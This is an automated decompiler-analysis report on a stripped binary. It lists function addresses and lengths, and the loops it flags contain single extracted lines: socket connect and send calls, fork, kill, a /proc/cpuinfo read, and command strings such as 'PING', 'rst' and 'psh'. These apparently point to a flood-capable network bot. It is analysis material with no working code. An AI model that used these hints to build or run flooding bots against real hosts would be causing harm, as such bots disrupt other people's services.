=================FUNCTION : function_412464 ===================
++++++++ FUNCTION START 84991
++++++++ FUNCTION END 85389
++++++++ FUNCTION LENGTH 398
    while (true) {
    while (true) {
=================FUNCTION : function_40f6b0 ===================
++++++++ FUNCTION START 64067
++++++++ FUNCTION END 65184
++++++++ FUNCTION LENGTH 1117
        case 43: {
        case 45: {
=================FUNCTION : function_411d70 ===================
++++++++ FUNCTION START 81100
++++++++ FUNCTION END 81520
++++++++ FUNCTION LENGTH 420
    while (true) {
        while (true) {
=================FUNCTION : function_40da54 ===================
++++++++ FUNCTION START 46380
++++++++ FUNCTION END 46804
++++++++ FUNCTION LENGTH 424
    while (true) {
    while (true) {
=================FUNCTION : function_40e4f0 ===================
++++++++ FUNCTION START 54730
++++++++ FUNCTION END 55071
++++++++ FUNCTION LENGTH 341
    int32_t v329 = send(sock, buf, length, flags); // 0x40e510
    if (flags != 0) {
=================FUNCTION : function_40df80 ===================
++++++++ FUNCTION START 49890
++++++++ FUNCTION END 50298
++++++++ FUNCTION LENGTH 408
    while (true) {
        while (true) {
=================FUNCTION : function_410ff0 ===================
++++++++ FUNCTION START 76352
++++++++ FUNCTION END 76705
++++++++ FUNCTION LENGTH 353
        case 256: {
        case 2048: {
=================FUNCTION : function_40dc70 ===================
++++++++ FUNCTION START 48243
++++++++ FUNCTION END 48662
++++++++ FUNCTION LENGTH 419
                            while (true) {
    while (true) {
=================FUNCTION : function_400f64 ===================
++++++++ FUNCTION START 4979
++++++++ FUNCTION END 5508
++++++++ FUNCTION LENGTH 529
    while (true) {
                        while (true) {
=================FUNCTION : function_4036e8 ===================
++++++++ FUNCTION START 12448
++++++++ FUNCTION END 12876
++++++++ FUNCTION LENGTH 428
    while (true) {
        while (true) {
=================FUNCTION : function_402ce0 ===================
++++++++ FUNCTION START 10937
++++++++ FUNCTION END 11318
++++++++ FUNCTION LENGTH 381
    function_40e350(a1, (struct sockaddr *)&v329, 16);
        while (true) {
=================FUNCTION : function_40d880 ===================
++++++++ FUNCTION START 44987
++++++++ FUNCTION END 45577
++++++++ FUNCTION LENGTH 590
        while (true) {
=================FUNCTION : function_40301c ===================
++++++++ FUNCTION START 11321
++++++++ FUNCTION END 11679
++++++++ FUNCTION LENGTH 358
    while (true) {
=================FUNCTION : function_4106e0 ===================
++++++++ FUNCTION START 71151
++++++++ FUNCTION END 71493
++++++++ FUNCTION LENGTH 342
    int32_t v329 = geteuid(); // 0x410700
=================FUNCTION : function_40b920 ===================
++++++++ FUNCTION START 24096
++++++++ FUNCTION END 24438
++++++++ FUNCTION LENGTH 342
    int32_t v329 = kill(pid, sig_num); // 0x40b940
=================FUNCTION : function_40f3cc ===================
++++++++ FUNCTION START 62976
++++++++ FUNCTION END 63359
++++++++ FUNCTION LENGTH 383
    while (true) {
=================FUNCTION : function_40e240 ===================
++++++++ FUNCTION START 52319
++++++++ FUNCTION END 52670
++++++++ FUNCTION LENGTH 351
    while (true) {
=================FUNCTION : function_40c280 ===================
++++++++ FUNCTION START 31353
++++++++ FUNCTION END 31707
++++++++ FUNCTION LENGTH 354
    while (true) {
=================FUNCTION : function_403a4c ===================
++++++++ FUNCTION START 12879
++++++++ FUNCTION END 13311
++++++++ FUNCTION LENGTH 432
    while (true) {
=================FUNCTION : function_40e410 ===================
++++++++ FUNCTION START 54042
++++++++ FUNCTION END 54383
++++++++ FUNCTION LENGTH 341
    int32_t v329 = getsockopt(sock, level, option_name, option_value, NULL); // 0x40e448
=================FUNCTION : function_40bb60 ===================
++++++++ FUNCTION START 26158
++++++++ FUNCTION END 26514
++++++++ FUNCTION LENGTH 356
    int32_t v329 = sigprocmask(how, set, (struct _TYPEDEF_sigset_t *)oset); // 0x40bbb8
=================FUNCTION : function_40e5d0 ===================
++++++++ FUNCTION START 55418
++++++++ FUNCTION END 55759
++++++++ FUNCTION LENGTH 341
    int32_t v329 = setsockopt(sock, level, option_name, option_value, 0); // 0x40e608
=================FUNCTION : function_4026f8 ===================
++++++++ FUNCTION START 9812
++++++++ FUNCTION END 10158
++++++++ FUNCTION LENGTH 346
    int32_t v329 = function_40b980("/proc/cpuinfo", 0); // 0x402734
=================FUNCTION : function_40e350 ===================
++++++++ FUNCTION START 53352
++++++++ FUNCTION END 53694
++++++++ FUNCTION LENGTH 342
    int32_t v329 = connect(sock, addr, addr_len); // 0x40e370
=================FUNCTION : function_40080c ===================
++++++++ FUNCTION START 3412
++++++++ FUNCTION END 3773
++++++++ FUNCTION LENGTH 361
    while (true) {
=================FUNCTION : function_40cce0 ===================
++++++++ FUNCTION START 41719
++++++++ FUNCTION END 42177
++++++++ FUNCTION LENGTH 458
        while (true) {
=================FUNCTION : function_401e4c ===================
++++++++ FUNCTION START 7500
++++++++ FUNCTION END 7858
++++++++ FUNCTION LENGTH 358
    while (true) {
=================FUNCTION : function_40b680 ===================
++++++++ FUNCTION START 21686
++++++++ FUNCTION END 22028
++++++++ FUNCTION LENGTH 342
    int32_t v329 = close(fd); // 0x40b6a0
=================FUNCTION : function_400a90 ===================
++++++++ FUNCTION START 4115
++++++++ FUNCTION END 4552
++++++++ FUNCTION LENGTH 437
        while (true) {
=================FUNCTION : function_410920 ===================
++++++++ FUNCTION START 73251
++++++++ FUNCTION END 73592
++++++++ FUNCTION LENGTH 341
    int32_t v329 = wait4(pid, status, options, rusage); // 0x410940
=================FUNCTION : function_401f70 ===================
++++++++ FUNCTION START 7861
++++++++ FUNCTION END 8213
++++++++ FUNCTION LENGTH 352
    while (true) {
=================FUNCTION : function_40b740 ===================
++++++++ FUNCTION START 22376
++++++++ FUNCTION END 22718
++++++++ FUNCTION LENGTH 342
    int32_t v329 = fork(); // 0x40b760
=================FUNCTION : function_40db50 ===================
++++++++ FUNCTION START 47142
++++++++ FUNCTION END 47495
++++++++ FUNCTION LENGTH 353
    while (true) {
=================FUNCTION : function_40b980 ===================
++++++++ FUNCTION START 24441
++++++++ FUNCTION END 24788
++++++++ FUNCTION LENGTH 347
    int32_t fd = open(path, oflag); // 0x40b9c4
=================FUNCTION : function_40b7f0 ===================
++++++++ FUNCTION START 23061
++++++++ FUNCTION END 23403
++++++++ FUNCTION LENGTH 342
    int32_t pid = getpid(); // 0x40b810
=================FUNCTION : function_4105c0 ===================
++++++++ FUNCTION START 70112
++++++++ FUNCTION END 70454
++++++++ FUNCTION LENGTH 342
    int32_t v329 = sys_clock_getres(a1, a2); // 0x4105e0
=================FUNCTION : function_4100b8 ===================
++++++++ FUNCTION START 68407
++++++++ FUNCTION END 69076
++++++++ FUNCTION LENGTH 669
    while (true) {
=================FUNCTION : function_410740 ===================
++++++++ FUNCTION START 71496
++++++++ FUNCTION END 71838
++++++++ FUNCTION LENGTH 342
    int32_t v329 = getgid(); // 0x410760
=================FUNCTION : function_40e3b0 ===================
++++++++ FUNCTION START 53697
++++++++ FUNCTION END 54039
++++++++ FUNCTION LENGTH 342
    int32_t v329 = getsockname(sock, addr, (int32_t *)addr_len); // 0x40e3d0
=================FUNCTION : function_40ec70 ===================
++++++++ FUNCTION START 59038
++++++++ FUNCTION END 59420
++++++++ FUNCTION LENGTH 382
    while (true) {
=================FUNCTION : function_412534 ===================
++++++++ FUNCTION START 85727
++++++++ FUNCTION END 86106
++++++++ FUNCTION LENGTH 379
    while (true) {
=================FUNCTION : function_410b20 ===================
++++++++ FUNCTION START 74712
++++++++ FUNCTION END 75118
++++++++ FUNCTION LENGTH 406
        while (true) {
=================FUNCTION : function_410680 ===================
++++++++ FUNCTION START 70806
++++++++ FUNCTION END 71148
++++++++ FUNCTION LENGTH 342
    int32_t v329 = getegid(); // 0x4106a0
=================FUNCTION : function_4107d0 ===================
++++++++ FUNCTION START 72176
++++++++ FUNCTION END 72518
++++++++ FUNCTION LENGTH 342
    int32_t v329 = getuid(); // 0x4107f0
=================FUNCTION : function_40cf00 ===================
++++++++ FUNCTION START 42180
++++++++ FUNCTION END 42532
++++++++ FUNCTION LENGTH 352
    while (true) {
=================FUNCTION : function_40b850 ===================
++++++++ FUNCTION START 23406
++++++++ FUNCTION END 23748
++++++++ FUNCTION LENGTH 342
    int32_t v329 = getrlimit(resource, rlp); // 0x40b870
=================FUNCTION : function_410a30 ===================
++++++++ FUNCTION START 74275
++++++++ FUNCTION END 74709
++++++++ FUNCTION LENGTH 434
        while (true) {
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 5 @ function_400f64 ====================================
++++++++ WHILE START : 5316 
++++++++ WHILE FUNCTION : function_400f64 
++++++++ WHILE END : 5499 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 11 @ function_4023f4 ====================================
++++++++ WHILE START : 9725 
++++++++ WHILE FUNCTION : function_4023f4 
++++++++ WHILE END : 9762 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 13 @ function_402940 ====================================
++++++++ WHILE START : 10856 
++++++++ WHILE FUNCTION : function_402940 
++++++++ WHILE END : 10920 
++++++++ INTRESTING INSTRUCTIONS :  
		function_401604(v338, (int32_t)"PING");
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 17 @ function_4034d0 ====================================
++++++++ WHILE START : 12389 
++++++++ WHILE FUNCTION : function_4034d0 
++++++++ WHILE END : 12444 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 18 @ function_4036e8 ====================================
++++++++ WHILE START : 12781 
++++++++ WHILE FUNCTION : function_4036e8 
++++++++ WHILE END : 12873 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 20 @ function_4045fc ====================================
++++++++ WHILE START : 15394 
++++++++ WHILE FUNCTION : function_4045fc 
++++++++ WHILE END : 15720 
++++++++ INTRESTING INSTRUCTIONS :  
		if (function_40e350(*v348, (struct sockaddr *)&v330, 16) == -1) {
		while (true) {
=============================WHILE LOOPS ID : 21 @ function_40704c ====================================
++++++++ WHILE START : 16623 
++++++++ WHILE FUNCTION : function_40704c 
++++++++ WHILE END : 16664 
++++++++ INTRESTING INSTRUCTIONS :  
		if (function_40db50(v343, (int32_t)"rst") == 0) {
		if (function_40db50(v343, (int32_t)"psh") == 0) {
=============================WHILE LOOPS ID : 22 @ function_4079a8 ====================================
++++++++ WHILE START : 17062 
++++++++ WHILE FUNCTION : function_4079a8 
++++++++ WHILE END : 17195 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		if (function_40e350(*v358, (struct sockaddr *)&v332, 16) == -1) {
=============================WHILE LOOPS ID : 23 @ function_4080dc ====================================
++++++++ WHILE START : 17552 
++++++++ WHILE FUNCTION : function_4080dc 
++++++++ WHILE END : 17679 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		if (function_40e350(*v358, (struct sockaddr *)&v332, 16) == -1) {
=============================WHILE LOOPS ID : 30 @ function_40a1b0 ====================================
++++++++ WHILE START : 19580 
++++++++ WHILE FUNCTION : function_40a1b0 
++++++++ WHILE END : 19897 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 36 @ function_40c3e4 ====================================
++++++++ WHILE START : 32492 
++++++++ WHILE FUNCTION : function_40c3e4 
++++++++ WHILE END : 40465 
++++++++ INTRESTING INSTRUCTIONS :  
		case 37: {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		case 0: {
		while (true) {
=============================WHILE LOOPS ID : 37 @ function_40c3e4 ====================================
++++++++ WHILE START : 40471 
++++++++ WHILE FUNCTION : function_40c3e4 
++++++++ WHILE END : 40967 
++++++++ INTRESTING INSTRUCTIONS :  
		case 37: {
		while (true) {
		case 0: {
		while (true) {
=============================WHILE LOOPS ID : 42 @ function_40cf6c ====================================
++++++++ WHILE START : 42880 
++++++++ WHILE FUNCTION : function_40cf6c 
++++++++ WHILE END : 43693 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 51 @ function_40dd30 ====================================
++++++++ WHILE START : 48999 
++++++++ WHILE FUNCTION : function_40dd30 
++++++++ WHILE END : 49091 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 53 @ function_40de30 ====================================
++++++++ WHILE START : 49458 
++++++++ WHILE FUNCTION : function_40de30 
++++++++ WHILE END : 49551 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 54 @ function_40df80 ====================================
++++++++ WHILE START : 50220 
++++++++ WHILE FUNCTION : function_40df80 
++++++++ WHILE END : 50297 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 64 @ function_4111a0 ====================================
++++++++ WHILE START : 77623 
++++++++ WHILE FUNCTION : function_4111a0 
++++++++ WHILE END : 78497 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 68 @ function_411b50 ====================================
++++++++ WHILE START : 79933 
++++++++ WHILE FUNCTION : function_411b50 
++++++++ WHILE END : 80022 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 69 @ function_411d34 ====================================
++++++++ WHILE START : 81054 
++++++++ WHILE FUNCTION : function_411d34 
++++++++ WHILE END : 81096 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 70 @ function_411d70 ====================================
++++++++ WHILE START : 81438 
++++++++ WHILE FUNCTION : function_411d70 
++++++++ WHILE END : 81512 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
